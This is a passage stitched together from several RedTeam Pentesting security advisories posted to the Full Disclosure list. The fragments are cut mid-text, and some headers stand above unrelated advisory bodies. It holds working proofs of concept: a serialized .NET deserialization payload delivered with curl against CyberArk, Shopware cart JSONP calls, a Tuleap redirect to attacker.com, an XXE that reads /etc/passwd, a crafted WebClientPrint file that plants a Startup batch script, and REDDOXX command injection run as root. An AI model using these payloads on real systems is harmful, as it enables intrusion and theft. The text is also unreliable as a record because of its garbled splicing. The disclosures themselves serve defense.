wgU3lz dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49 Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNSVN5 c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYP BVN0YXJ0CRAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph dGlvbkhvbGRlcgcETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U eXBlW10JDwkNCQ4GFD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVPlN5c3RlbS5EaWFnbm9z dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAoB CgkGFgdDb21wYXJlCQwGGA1TeXN0ZW0uU3RyaW5nBhkrSW50 MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaMlN5c3RlbS5J bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAoBEAgA AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1 YzU2MTkzNGUwODldXQkMCgkMCRgJFgoL Next, an API call is invoked which includes the malicious .NET object in its authorization header. This is done with cURL [3] as follows: $ curl -s -X GET -k \ --url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\ 'Applications/?Location=\&IncludeSublocations=true' \ --header "authorization: $(cat execute-ping.txt)" \ --header 'content-type: application/json' Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen for ICMP packets originating from the web server: $ sudo tcpdump -i enp0s25 icmp tcpdump: verbose output suppressed[...] listening on enp0s25[...] IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40 IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40 The fact that ICMP packets are received from the web server, indicates that attacker-controlled code was executed. Workaround == Disable any access to the API at the route /PasswordVault/WebServices. Fix === Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or 10.2. Security Risk = The risk of this vulnerability is rated as high. Attackers with access to the PrivateArk Vault Web Access REST API may execute arbitrary code on the web server. No credentials are required. Attackers gain access to the system with the privileges of the web application. Consequently, such access may be used to backdoor the web application and compromise further accounts and credentials. Additionally, attackers may pivot from the web server to attack the vault directly. Timeline 2017-11-24 Vulnerability identified 2018-01-22 Customer approved disclosure to vendor 2018-02-05 Vendor notified 2018-02-28 Vendor released fixed version 2018-04-06 CVE number requested 2018-04-07 CVE number assigned 2018-04-09 Advisory released References == [1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf [2] https://github.com/pwntester/ysoserial.net [3] https://curl.haxx.se/ [4] https://www.tcpdump.org/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites
Advisory: Shopware Cart Accessible by Third-Party Websites RedTeam Pentesting discovered that the shopping cart implemented by Shopware offers an insecure API. Malicious, third-party websites may abuse this API to list, add or remove products from a user's cart. Details === Product: Shopware Affected Versions: 4.0.1 - 5.3.7 Fixed Versions: > 5.4.0 Vulnerability Type: Cross-Site Request Forgery Security Risk: low Vendor URL: https://shopware.com Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform." (from the Shopware GitHub repository [1]) More Details The Shopware web application provides users with a virtual shopping cart to collect products prior to checkout. This cart is displayed to the user as a modal sidebar appearing at the right edge of the browser window. Consequently, Shopware implements several API endpoints to allow JavaScript code to perform shopping cart operations. These endpoints are implemented in the "Shopware_Controllers_Frontend_Checkout" class and can be reached through the following paths: * /checkout/ajaxCart * /checkout/ajaxAddArticleCart * /checkout/ajaxDeleteArticleCart RedTeam Pentesting discovered that API endpoints support JSONP by specifying a URL parameter named callback. The origin of calls to the cart API is not validated. Therefore, any third-party website may make use of this API. If a customer of a Shopware shop visits a malicious, attacker-controlled website, JavaScript code on this site may access the user's shopping cart. Proof of Concept The following JavaScript snippets demonstrate how to access the cart of a Shopware shop at "https://example.net"; from a third-party website. The "getJSON" function of jQuery 3 is used to interface with the JSONP API. By running the following code, the contents of a cart may be retrieved. The result of the API call is displayed on the browser's developer console. $.getJSON("https://example.net/checkout/ajaxCart?callback=?";) .done(console.log); The following code adds a new product to the cart. In this case, two instances of product 1234 are added. $.getJSON( "https://example.net/checkout/ajaxAddArticleCart"+ "?callback=?&sAdd=1234&sQuantity=2" ).done(console.log); To remove a product from a user's shopping cart, attackers may use the following code. An id for the "sDelete" parameter may be obtained through a prior call to ajaxCart. $.getJSON( "https://example.net/checkout/ajaxDeleteArticleCart"+ "?callback=?&sDelete=4321" ).done(console.log); Workaround == Support for JSONP should be removed from the cart AJAX API. This ensures, that only JavaScript code from the same origin may access the API and respectively the cart's contents. Furthermore, operations which change the state of the cart, i.e. adding and removing products, must be protected with CSRF tokens. Fix === Upgrade to Shopware newer than 5.4.0. Security Risk = This vulnerability is rated as a low risk. Disclosure of a user's shopping cart to attackers may negatively impact the user's privacy. Furthermore, competing eCommerce sites may use this information to improve sales. By adding or removing products from a user's cart, attackers can negatively impact a user's shopping experience and create support effort for the shop operator. Timeline 2017-08-28 Vulnerability identified 2017-09-13 Customer approved disclosure to vendor 2017-09-14 Vendor notified 2018-02-27 Vendor released fixed version 2018-03-13 Advisory released References == [1] https://github.com/shopware/shopware [2] https://community.shopware.com/Downloads_cat_448.html#5.4.0 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specia
[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap
Advisory: Arbitrary Redirect in Tuleap RedTeam Pentesting discovered an arbitrary redirect vulnerability in the redirect mechanism of the application lifecycle management platform Tuleap. Details === Product: Tuleap Affected Versions: > 9.17.99.93 Fixed Versions: >= 9.17.99.93 Vulnerability Type: Arbitrary Redirect Security Risk: low Vendor URL: https://www.tuleap.org/ Vendor Status: fixed version released Vendor Issue URL: https://tuleap.net/plugins/tracker/?aid=11136 Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-001 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction "Tuleap is an open source tool for Scrum, Kanban, waterfall, requirement management. Plan, track, code and collaborate on software projects, you get everything at hand." (from the Tuleap website [1]) More Details RedTeam Pentesting discovered an arbitrary redirect vulnerability in the way Tuleap handles redirects. Usually this function is only used in Tuleap after an successful login to assigned trackers, however the redirect can be used indepented of whether a user is authenticated to the application. While the application employs a URL filter to prevent arbitrary redirects, the URL filter can be bypassed. This allows attackers to redirect users to a different website, if a user opens an attacker prepared URL. The filter can be bypassed by using protocol relative URLs, which omit the leading protocol identifier. These arbitrary URLs are prefixed with two slashes, which instructs the browser to use the same protocol as the current page. This behaviour is specified in RFC 3986 [2] in section 5.4. Proof of Concept The following URL to an example installation of Tuleap will redirect users to an attacker controlled website: https://example.net/my/redirect.php?return_to=//attacker.com Workaround == Currently no workaround is known. Fix === Upgrade to at least tuleap version 9.17.99.93. Security Risk = Attackers may convice users to use a prepared link to access a valid Tuleap instance, which then redirects users to a fake login page. This can greatly increase the effectiveness of phishing attacks and may allow attackers to steal user credentials more effectively. However, no credentials or sensitive information can be extracted directly. Furthermore, the website to which users are going to be redirected will be displayed in the browser location bar so that users may identify the attack. Therefore, we rate this vulnerability with a low risk. Nevertheless, it is very easy for attackers to identify this vulnerability and create malicious URLs, which makes it very likely that attackers might abuse this. Timeline 2018-01-02 Vulnerability identified 2018-01-11 Customer approved disclosure to vendor 2018-02-13 Vendor notified 2018-02-14 Vendor released fixed version 2018-03-05 Vendor made issue public 2018-03-08 Advisory released References == [1] https://www.tuleap.org/what-is-tuleap [2] https://tools.ietf.org/html/rfc3986 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-013] Truncation of SAML Attributes in Shibboleth 2
aced with "&s;taf&f1;". After these modifications, the XML document is re-inserted into the HTTP POST request which is then sent to the service provider. The SAML response is accepted by the service provider. Due to the vulnerability, the service provider application reports "taf" as the value of the "uid" attribute. Workaround == The use of XML encryption can serve as a mitigation for this vulnerability but may still allow attacks in certain scenarios. Fix === Manually update to the latest version [4] as described in the security advisory published by Shibboleth [5]. Alternatively, use the operating system's package management to receive the update [6]. Furthermore, a new version of the XMLTooling-C library (1.6.3) has been released to address this vulnerability. DTD processing is now disabled in the XML parser. Yet, some platforms ship with old parser versions that do not allow DTD processing to be disabled, namely Red Hat and CentOS. Therefore, the "unmarshallContent" function has also been hardened to mitigate the vulnerability on these platforms. Security Risk = The key feature of Shibboleth, secure transfer of assertions, is compromised. Therefore, the vulnerability is rated as a high risk. In certain circumstances, this might lead to a complete bypass of authorisation mechanisms. In practice, the risk for service providers is highly dependent on the actual deployment of the Shibboleth infrastructure: Sometimes, SAML responses are encrypted or not transferred through a browser. In this case, an attacker is not able to insert XML entities. Whether truncating SAML attribute values is profitable for attackers also depends on the actual use and structure of these values. Attackers may use an application's self-service features to change their account's email to a manipulated but valid address. Truncation of this email address in a SAML response could lead to access to further accounts, effectively bypassing authorisation mechanisms. Timeline 2017-11-06 Vulnerability identified 2017-11-13 Customer approved further research 2017-12-01 Further research conducted 2018-01-09 Customer approved disclosure to vendor 2018-01-10 Vendor notified 2018-01-12 Vendor released fixed version 2018-01-15 Advisory released References == [1] https://www.shibboleth.net/ [2] https://www.w3.org/TR/xmldsig-core/ [3] https://github.com/UniconLabs/dockerized-idp-testbed [4] https://shibboleth.net/downloads/service-provider/2.6.1/ [5] https://shibboleth.net/community/advisories/secadv_20180112.txt [6] https://security-tracker.debian.org/tracker/CVE-2018-0486 RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2016-008] XML External Entity Expansion in Ladon Webservice
schemas.xmlsoap.org/soap/encoding/\";> &passwd; ' \ 'http://localhost:/HelloService/soap11' | xmllint --format - The server answers with a response containing the passwd-file: http://schemas.xmlsoap.org/soap/encoding/"; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ns="urn:HelloService" xmlns:xsd="http://www.w3.org/2001/XMLSchema";> http://schemas.xmlsoap.org/soap/encoding/";> Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...] Workaround == The Python package defusedxml [2] can be used to monkey patch the code to prevent XML vulnerabilities. The following workaround can be included in the code, which prevents exploitation: [...] import defusedxml defusedxml.defuse_stdlib() [...] Fix === Currently no fix is available. Security Risk = Attackers are able to read local files on the server of the webservice with the privileges of the webservice. Furthermore, attackers are able to create HTTP request from the webservice to other services on the Internet or the local network. It is likely that attackers are able to gain access to credentials for database services used by the webservice. Attackers may also be able to cause a denial-of-service attack against the respective webservice. Depending on the data stored on the vulnerable system and the relevance of the webservice, this vulnerability may pose a high risk. Timeline 2016-11-29 Vulnerability identified 2016-11-29 Customer notified vendor 2017-07-10 Customer fixed problem in their own product 2017-07-21 RedTeam Pentesting notified vendor 2017-08-11 RedTeam Pentesting asked vendor for status update 2017-09-08 RedTeam Pentesting asked vendor for status update and announced public release for end of October 2017-10-09 RedTeam Pentesting asked vendor for status update 2017-11-03 Advisory released (no reply from vendor to status update requests) References == [1] http://ladonize.org [2] https://pypi.python.org/pypi/defusedxml RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen signature.asc Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates
. Workaround == Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible. Fix === Install a WCPP version greater or equal to 2.0.15.910[0]. Security Risk = WCPP does not verify TLS certificates when establishing HTTPS connections. Man-in-the-middle attackers can therefore intercept those connections with little effort. This may lead to a disclosure of confidential information if sensitive documents are printed via WCPP. Furthermore, the integrity of the printed documents cannot be guaranteed as attackers are able to modify the documents in transit. The described attack requires a man-in-the-middle position which is a rather strong prerequisite. It is therefore estimated that the vulnerability poses a medium risk. Timeline 2015-08-24 Vulnerability identified 2015-09-03 Customer approved disclosure to vendor 2015-09-04 Asked vendor for security contact 2015-09-04 CVE number requested 2015-09-04 Vendor responded with security contact 2015-09-07 Vendor notified 2015-09-07 Vendor acknowledged receipt of advisory 2015-09-15 Vendor released fixed version 2015-09-16 Customer asked to wait with advisory release until all their clients are updated 2017-07-31 Customer approved advisory release 2017-08-22 Advisory released References == [0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/ [1] http://www.dest-unreach.org/socat/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpDF7EEojbxY.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification
ed 2017-07-31 Customer approved advisory release 2017-08-22 Advisory released References == [0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpmrIlY1JY3c.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-009] WebClientPrint Processor 2.0: Remote Code Execution via Updates
migrating the malicious code to another place. This way, WCPP functionality would not be disrupted and the attacked users may be tricked to believe that a legitimate update has just occurred. Because of the rarely fulfilled prerequisite of a browser running with elevated or administrative privileges, this vulnerability is estimated to pose a low risk. Timeline 2015-08-24 Vulnerability identified 2015-09-03 Customer approved disclosure to vendor 2015-09-04 Asked vendor for security contact 2015-09-04 CVE number requested 2015-09-04 Vendor responded with security contact 2015-09-07 Vendor notified 2015-09-07 Vendor acknowledged receipt of advisory 2015-09-15 Vendor released fixed version 2015-09-16 Customer asked to wait with advisory release until all their clients are updated 2017-07-31 Customer approved advisory release 2017-08-22 Advisory released References == [0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpoS229iH0RT.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs
MP% directory. Typically, this directory is located at: C:\Users\\AppData\Local\Temp\ Proof of Concept During RedTeam Pentesting's analysis of WCPP it was found that malicious CPJ files can be crafted that exploit a directory traversal bug in WCPP. Such an example is given in the following hexdump, showing the file rce-user.txt: --- $ xxd rce-user.txt : 6370 6a02 0201 0301 7763 7050 cpj.wcpP 0010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c F:..\..\Roaming\ 0020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77 Microsoft\Window 0030: 735c 5374 6172 7420 4d65 6e75 5c50 726f s\Start Menu\Pro 0040: 6772 616d 735c 5374 6172 7475 705c 5265 grams\Startup\Re 0050: 6454 6561 6d2e 6261 747c 4065 6368 6f20 dTeam.bat|@echo 0060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d off..cls..echo.. 0070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43 .echo Proof-of-C 0080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d oncept..echo --- 0090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65 -..e 00a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520 cho Remote Code 00b0: 4578 6563 7574 696f 6e20 7669 6120 5765 Execution via We 00c0: 6243 6c69 656e 7450 7269 6e74 2076 322e bClientPrint v2. 00d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c 0.15.109..FOR /L 00e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829 %%x IN (1,1,18) 00f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274 DO echo...start 0100: 2063 616c 630d 0a70 6175 7365 0d0a 007c calc..pause...| --- In this example the filename is set to ..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat which is appended to the %TEMP% directory as follows: C:\Users\\AppData\Local\Temp\..\..\Roaming\Microsoft\Windows\ Start Menu\Programs\Startup\RedTeam.bat After resolving the "..\..\" sequence contained in the filename, this yields the following path: C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ Startup\RedTeam.bat As a consequence, the file content beginning at 0x5a is written to the file RedTeam.bat in the current user's Startup folder. Therefore, RedTeam.bat will be executed once the affected user logs in again. As a proof of concept, a text will be displayed and Windows' calculator is executed. On one hand, this exploit can be executed when the following URL is entered into the URL bar of a browser: webclientprint:https://example.com/somedir/rce-user.txt On the other hand, visiting users of a malicious website may be attacked without user interaction when the webclientprint URL is embedded into an iframe as follows: --- https://example.com/somedir/rce-user.txt";> --- The proof of concept printed above contains no valid license key, so a notification window is shown when the exploit is executed. However, this does not prevent successful exploitation. Attackers can easily add a valid license key (e.g. by buying a license), so the window is not shown and there is no visual indication of exploitation anymore. The proof of concept is designed to print using the default printer. Since WCPP does not seem to know how to print batch files, it exits silently with the result that a successful attack does not print the batch file. Workaround == Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible. Fix === Install a WCPP version greater or equal to 2.0.15.910[1]. Security Risk = If a user of WCPP visits an attacker-controlled website, arbitrary code can be executed on the attacked user's computer. If a valid license key is provided, there is no visual indication of the ongoing attack. Furthermore, no user interaction is required to trigger the vulnerability once a malicious website is visited. It is therefore estimated that this vulnerability poses a high risk. Timeline 2015-08-24 Vulnerability identified 2015-09-03 Customer approved disclosure to vendor 2015-09-04 Asked vendor for security contact 2015-09-04 CVE number requested 2015-09-04 Vendor responded with security contact 2015-09-07 Vendor notified 2015-09-07 Vendor acknowledged receipt of advisory 2015-09-15 Vendor released fixed version 2015-09-16 Customer asked to wait with advisory release until all their clients are updated 2017-07-31 Customer approved advisory release 2017-08-22 Advisory released References ====== [0] http://webclientprint.azurewebsites.net/ [1] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of speci
[FD] [RT-SA-2016-007] Cross-Site Scripting in TYPO3 Formhandler Extension
twice for this attack to work and therefore can only target individual users. All in all this is considered to be a medium-risk vulnerability. Depending on the affected site the risk needs to be adjusted accordingly. Timeline 2016-09-22 Vulnerability identified 2016-10-07 Customer approved disclosure to vendor 2016-10-07 Vendor notified 2016-10-11 Preliminary advisory sent to vendor 2016-10-12 Vendor prepared patch and sent it to TYPO3 security team 2016-10-13 Customer needs time to test the patch and deploy it 2017-07-10 Customer finished testing and deployment of patch 2017-07-17 Vendor agreed to have patch published as PR on Github 2017-07-27 Vendor patch published as pull request for a possibly active fork 2017-07-27 Advisory released References == [0] https://github.com/reinhardfuehricht/typo3-formhandler/blob/master/Classes/Interceptor/RemoveXSS.php#L63 [1] https://docs.typo3.org/typo3cms/extensions/core/8-dev/Changelog/8.2/Deprecation-76164-DeprecateRemoveXSS.html [2] https://packetstormsecurity.com/files/137127/typo3-xssbypass.txt [3] http://examples.typo3-formhandler.com/start/ RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: https://www.redteam-pentesting.de/jobs/ -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpaqBAK0ZX3w.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-009] Remote Command Execution as root in REDDOXX Appliance
'REDTEAM_MARKER_END'"}}' \ http://www.example.com/api/v1/rws/diagnose/start Here, the count parameter "1 && echo 'REDTEAM_MARKER_START' && id && echo 'REDTEAM_MARKER_END'" is submitted. The two echo commands with markers are only used to distinguish the output of the "id" command in the final result, which can be retrieved and displayed using the following curl command-line: $ curl --silent -H 'Accept: application/json' \ http://www.example.com/api/v1/rws/diagnose/result/Ping | jq .Output | \ sed 's;.*REDTEAM_MARKER_START\\n\(.*\)\\nREDTEAM_MARKER_END.*;\1;' | \ sed 's/\\n/\n/g' uid=0(root) gid=0(root) groups=0(root) Workaround == None Fix === Update the appliance software to Version 2032 SP2. Security Risk = The diagnostic functions offered by the REDDOXX appliance allow attackers to execute arbitrary commands. Since the commands are executed with root privileges and no authentication is required, this is rated as a high risk. Timeline 2017-05-17 Vulnerability identified 2017-05-23 Customer approved disclosure of vulnerability 2017-05-26 Customer provided details of vulnerability to vendor 2017-07-20 Vulnerability reported as fixed by vendor 2017-07-24 Advisory released References == [0] https://www.reddoxx.com/en/ [1] https://my.reddoxx.com/documents/manual/en/custdl/product-downloads (Requires login) RedTeam Pentesting GmbH === RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ Working at RedTeam Pentesting = RedTeam Pentesting GmbH is looking for more penetration testers to join our team. If you are interested in working for RedTeam Pentesting in Aachen, please visit the respective section of our website. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachenhttps://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen pgpQ3Vv7HVOHg.pgp Description: PGP signature ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] [RT-SA-2017-008] Unauthenticated Access to Diagnostic Functions in REDDOXX Appliance
